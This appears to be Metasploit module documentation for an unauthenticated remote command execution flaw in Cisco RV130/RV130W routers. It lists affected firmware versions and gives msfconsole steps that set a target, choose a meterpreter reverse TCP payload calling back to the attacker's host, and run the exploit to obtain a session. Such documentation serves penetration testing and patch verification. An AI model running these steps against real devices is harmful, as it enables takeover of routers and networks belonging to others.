# Cisco RV130W Routers Management Interface Remote Command Execution

A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.

The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.

A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
system of the affected device as a high-privilege user.

## Vulnerable Device

* RV130 Multifunction VPN Router versions prior to 1.0.3.45 are affected.
* RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.

This exploit was specifically written against version 1.0.3.28. To test, you can find the
firmware here: https://software.cisco.com/download/home/285026141/type/282465789/release/1.0.3.28

## Verification Steps

1. Start msfconsole
2. ```use exploit/linux/http/cisco_rv130_rmi_rce```
3. ```set rhost [IP]```
4. ```set payload linux/armle/meterpreter_reverse_tcp```
5. ```set lhost [IP]```
6. ```exploit```
7. You should get a session